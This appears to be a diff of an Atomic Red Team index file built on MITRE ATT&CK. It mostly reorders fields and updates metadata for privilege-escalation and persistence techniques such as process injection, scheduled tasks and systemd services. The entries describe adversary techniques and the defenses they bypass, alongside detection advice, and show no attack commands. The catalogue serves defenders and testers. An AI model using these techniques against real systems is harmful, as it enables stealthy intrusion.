+ Retrieved December 20, 2017.
+ source_name: Uninformed Needle
+ - source_name: GDS Linux Injection
+ url: https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html
+ description: McNamara, R. (2017, September 5). Linux Based Inter-Process Code
+ Injection Without Ptrace(2). Retrieved February 21, 2020.
+ - source_name: DD Man
+ url: http://man7.org/linux/man-pages/man1/dd.1.html
+ description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
+ February 21, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
privileges. Proc memory injection is a method of executing arbitrary code
@@ -4933,36 +5054,17 @@ privilege-escalation:
and possibly elevated privileges. Execution via proc memory injection may
also evade detection from security products since the execution is masked
under a legitimate process. "
- name: Proc Memory
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1055.009
- url: https://attack.mitre.org/techniques/T1055/009
- - url: http://hick.org/code/skape/papers/needle.txt
- description: skape. (2003, January 19). Linux x86 run-time process manipulation.
- Retrieved December 20, 2017.
- source_name: Uninformed Needle
- - source_name: GDS Linux Injection
- url: https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html
- description: McNamara, R. (2017, September 5). Linux Based Inter-Process Code
- Injection Without Ptrace(2). Retrieved February 21, 2020.
- - source_name: DD Man
- url: http://man7.org/linux/man-pages/man1/dd.1.html
- description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
- February 21, 2020.
+ id: attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T20:33:52.548Z'
+ modified: '2020-06-20T22:25:55.331Z'
created: '2020-01-14T01:34:10.588Z'
x_mitre_defense_bypassed:
- - Process whitelisting
+ - Application control
- Anti-virus
x_mitre_data_sources:
- Process monitoring
@@ -4976,7 +5078,6 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- - macOS
atomic_tests: []
T1055.013:
technique:
@@ -5052,29 +5153,29 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:05:42.921Z'
+ modified: '2020-06-20T22:27:21.304Z'
created: '2020-01-14T17:19:50.978Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
x_mitre_detection: |-
Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)
Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1055.012:
technique:
@@ -5121,12 +5222,16 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:00:39.428Z'
+ modified: '2020-06-20T22:28:08.758Z'
created: '2020-01-14T17:21:54.470Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -5139,14 +5244,10 @@ privilege-escalation:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1055.012
atomic_tests:
- name: Process Hollowing using PowerShell
@@ -5221,7 +5322,7 @@ privilege-escalation:
description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved
December 20, 2017.
source_name: GNU Acct
- - url: https://access.redhat.com/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
+ - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide -
Chapter 7 - System Auditing. Retrieved December 20, 2017.
source_name: RHEL auditd
@@ -5241,23 +5342,12 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:05:43.152Z'
+ modified: '2020-06-20T22:28:45.651Z'
created: '2017-05-31T21:30:47.843Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Anastasios Pingios
- - Christiaan Beek, @ChristiaanBeek
- - Ryan Becwar
- x_mitre_data_sources:
- - API monitoring
- - File monitoring
- - DLL monitoring
- - Process monitoring
- - Named Pipes
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Anti-virus
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -5280,10 +5370,21 @@ privilege-escalation:
to determine if a process is performing actions it usually does not, such
as opening network connections, reading files, or other suspicious actions
that could relate to post-compromise behavior. "
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - API monitoring
+ - File monitoring
+ - DLL monitoring
+ - Process monitoring
+ - Named Pipes
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Christiaan Beek, @ChristiaanBeek
+ - Ryan Becwar
+ x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: false
identifier: T1055
atomic_tests:
- name: Process Injection via mavinject.exe
@@ -5343,7 +5444,7 @@ privilege-escalation:
description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved
December 20, 2017.
source_name: GNU Acct
- - url: https://access.redhat.com/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
+ - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide -
Chapter 7 - System Auditing. Retrieved December 20, 2017.
source_name: RHEL auditd
@@ -5383,13 +5484,14 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T20:27:52.470Z'
+ modified: '2020-06-20T22:24:56.734Z'
created: '2020-01-14T01:33:19.065Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_data_sources:
+ - System calls
+ - Process monitoring
x_mitre_detection: "Monitoring for Linux specific calls such as the ptrace system
call should not generate large amounts of data due to their specialized nature,
and can be a very effective method to detect some of the common process injection
@@ -5398,12 +5500,10 @@ privilege-escalation:
behavior to determine if a process is performing actions it usually does not,
such as opening network connections, reading files, or other suspicious actions
that could relate to post-compromise behavior. "
- x_mitre_data_sources:
- - System calls
- - Process monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
atomic_tests: []
T1037.004:
technique:
@@ -5436,18 +5536,18 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-24T23:46:20.433Z'
created: '2020-01-15T16:25:22.260Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - root
- x_mitre_detection: 'The /etc/rc.common file can be monitored to
- detect changes from the company policy. Monitor process execution resulting
- from the rc.common script for unusual or unknown applications or behavior. '
+ x_mitre_platforms:
+ - macOS
x_mitre_data_sources:
- Process monitoring
- File monitoring
- x_mitre_platforms:
- - macOS
+ x_mitre_detection: 'The /etc/rc.common file can be monitored to
+ detect changes from the company policy. Monitor process execution resulting
+ from the rc.common script for unusual or unknown applications or behavior. '
+ x_mitre_permissions_required:
+ - root
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1037.004
atomic_tests:
- name: rc.common
@@ -5467,18 +5567,15 @@ privilege-escalation:
name: bash
T1547.007:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1547.007
- url: https://attack.mitre.org/techniques/T1547/007
- - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- description: Patrick Wardle. (2014, September). Methods of Malware Persistence
- on Mac OS X. Retrieved July 5, 2017.
- source_name: Methods of Mac Malware Persistence
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Re-opened Applications
+ created: '2020-01-24T18:15:06.641Z'
+ modified: '2020-01-24T19:51:37.795Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e
description: "Adversaries may modify plist files to automatically run an application
when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain
applications to be re-opened when a user logs into their machine after reboot.
@@ -5489,15 +5586,18 @@ privilege-escalation:
\n\nAn adversary can modify one of these files directly to include a link
to their malicious executable to provide a persistence mechanism each time
the user reboots their machine (Citation: Methods of Mac Malware Persistence)."
- id: attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-01-24T19:51:37.795Z'
- created: '2020-01-24T18:15:06.641Z'
+ name: Re-opened Applications
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1547.007
+ url: https://attack.mitre.org/techniques/T1547/007
+ - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
+ description: Patrick Wardle. (2014, September). Methods of Malware Persistence
+ on Mac OS X. Retrieved July 5, 2017.
+ source_name: Methods of Mac Malware Persistence
x_mitre_platforms:
- macOS
x_mitre_data_sources:
@@ -5625,22 +5725,22 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-25T16:16:26.182Z'
created: '2020-01-23T22:02:48.566Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Oddvar Moe, @oddvarmoe
- x_mitre_data_sources:
- - Windows Registry
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.
Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - File monitoring
+ x_mitre_contributors:
+ - Oddvar Moe, @oddvarmoe
+ x_mitre_platforms:
+ - Windows
identifier: T1547.001
atomic_tests:
- name: Reg Key Run
@@ -5819,24 +5919,24 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-26T21:49:31.964Z'
created: '2020-02-18T18:34:49.414Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Windows event logs
- - Authentication logs
- - API monitoring
+ x_mitre_contributors:
+ - Alain Homewood, Insomnia Security
+ - Vincent Le Toux
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
Examine data in user’s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)
Monitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory)
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Alain Homewood, Insomnia Security
- - Vincent Le Toux
+ x_mitre_data_sources:
+ - Windows event logs
+ - Authentication logs
+ - API monitoring
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1053.005:
technique:
@@ -5885,13 +5985,11 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-24T13:45:03.730Z'
created: '2019-11-27T14:58:00.429Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
@@ -5907,11 +6005,13 @@ privilege-escalation:
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_remote_support: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - Windows event logs
+ x_mitre_platforms:
+ - Windows
identifier: T1053.005
atomic_tests:
- name: Scheduled Task Startup Script
@@ -6050,19 +6150,18 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-24T13:45:04.006Z'
created: '2017-05-31T21:30:46.977Z'
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_remote_support: true
- x_mitre_effective_permissions:
- - SYSTEM
- - Administrator
- - User
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_contributors:
+ - Prashant Verma, Paladion
+ - Leo Loobeek, @leoloobeek
+ - Travis Smith, Tripwire
+ - Alain Homewood, Insomnia Security
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - Windows event logs
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -6073,18 +6172,19 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement."
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - Windows event logs
- x_mitre_contributors:
- - Prashant Verma, Paladion
- - Leo Loobeek, @leoloobeek
- - Travis Smith, Tripwire
- - Alain Homewood, Insomnia Security
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
+ x_mitre_effective_permissions:
+ - SYSTEM
+ - Administrator
+ - User
+ x_mitre_remote_support: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
atomic_tests: []
T1546.002:
technique:
@@ -6124,23 +6224,23 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-23T12:23:04.955Z'
created: '2020-01-24T13:51:01.210Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Bartosz Jerzman
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
+
+ Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.
x_mitre_data_sources:
- File monitoring
- Windows Registry
- Process command-line parameters
- Process monitoring
- x_mitre_detection: |-
- Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
-
- Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Bartosz Jerzman
+ x_mitre_platforms:
+ - Windows
identifier: T1546.002
atomic_tests:
- name: Set Arbitrary Binary as Screensaver
@@ -6198,22 +6298,22 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-25T15:42:48.910Z'
created: '2020-01-24T17:16:11.806Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - DLL monitoring
- - Windows Registry
- - Loaded DLLs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: 'Monitor the Registry for changes to the SSP Registry keys.
Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012
R2 may generate events when unsigned SSP DLLs try to load into the LSA by
setting the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber
2014) (Citation: Microsoft Configure LSA)'
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - DLL monitoring
+ - Windows Registry
+ - Loaded DLLs
+ x_mitre_platforms:
+ - Windows
identifier: T1547.005
atomic_tests:
- name: Modify SSP configuration in registry
@@ -6268,8 +6368,22 @@ privilege-escalation:
phase_name: defense-evasion
modified: '2020-03-26T19:37:28.912Z'
created: '2020-03-12T20:43:53.998Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Stefan Kanthak
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Services
+ - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ - Administrator
+ - User
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: "Look for changes to binaries and service executables that
may normally occur during software updates. If an executable is written, renamed,
and/or moved to match an existing service executable, it could be detected
@@ -6278,22 +6392,8 @@ privilege-escalation:
for abnormal process call trees from typical processes and services and for
execution of other commands that could relate to Discovery or other adversary
techniques. "
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Process command-line parameters
- - Services
- - File monitoring
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
identifier: T1574.010
atomic_tests:
- name: File System Permissions Weakness
@@ -6398,32 +6498,32 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T19:43:33.981Z'
+ modified: '2020-06-20T22:01:09.906Z'
created: '2020-03-13T11:42:14.444Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- - Matthew Demaske, Adaptforward
- x_mitre_data_sources:
- - Windows Registry
- - Services
- - Process command-line parameters
+ x_mitre_defense_bypassed:
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Process whitelisting
+ x_mitre_data_sources:
+ - Windows Registry
+ - Services
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ - Matthew Demaske, Adaptforward
+ x_mitre_platforms:
+ - Windows
identifier: T1574.011
atomic_tests:
- name: Service Registry Permissions Weakness
@@ -6476,20 +6576,20 @@ privilege-escalation:
phase_name: defense-evasion
modified: '2020-03-27T00:43:58.149Z'
created: '2020-01-30T14:11:41.212Z'
- x_mitre_platforms:
- - Linux
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Monitor the file system for files that have the setuid or
+ setgid bits set. Monitor for execution of utilities, like chmod, and their
+ command-line arguments to look for setuid or setguid bits being set.
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_detection: Monitor the file system for files that have the setuid or
- setgid bits set. Monitor for execution of utilities, like chmod, and their
- command-line arguments to look for setuid or setguid bits being set.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1548.001
atomic_tests:
- name: Make and modify binary from C source
@@ -6591,25 +6691,25 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-25T17:21:27.487Z'
created: '2020-01-24T19:00:32.917Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: Since a shortcut's target path likely will not change, modifications
to shortcut files that do not correlate with known software changes, patches,
removal, etc., may be suspicious. Analysis should attempt to relate shortcut
file change or creation events to other potentially suspicious events based
on known adversary behavior such as process launches of unknown executables
that make network connections.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ x_mitre_platforms:
+ - Windows
identifier: T1547.009
atomic_tests:
- name: Shortcut Modification
@@ -6705,19 +6805,19 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-24T23:47:39.124Z'
created: '2020-01-15T18:00:33.603Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - Administrator
+ x_mitre_platforms:
+ - macOS
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
x_mitre_detection: |-
The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.
Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- x_mitre_platforms:
- - macOS
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1037.005
atomic_tests:
- name: Add file to Local Library StartupItems
@@ -6777,23 +6877,23 @@ privilege-escalation:
phase_name: defense-evasion
modified: '2020-03-27T01:03:26.306Z'
created: '2020-01-30T14:34:44.992Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - root
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: On Linux, auditd can alert every time a user's actual ID
and effective ID are different (this is what happens when you sudo). This
technique is abusing normal functionality in macOS and Linux systems, but
sudo has the ability to log all input and output based on the LOG_INPUT
and LOG_OUTPUT directives in the /etc/sudoers file.
- x_mitre_permissions_required:
- - User
- x_mitre_effective_permissions:
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1548.003
atomic_tests:
- name: Sudo usage
@@ -6915,25 +7015,25 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-25T22:13:59.473Z'
created: '2020-01-17T16:15:19.870Z'
- x_mitre_contributors:
- - Tony Lambert, Red Canary
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - root
+ x_mitre_platforms:
+ - Linux
x_mitre_detection: |-
Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -–type=service –all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables.
Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution.
- x_mitre_platforms:
- - Linux
+ x_mitre_permissions_required:
+ - User
+ - root
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Tony Lambert, Red Canary
identifier: T1543.002
atomic_tests:
- name: Create Systemd Service
@@ -7041,12 +7141,16 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-02-21T22:40:58.149Z'
+ modified: '2020-06-20T22:21:29.233Z'
created: '2020-01-14T01:28:32.166Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
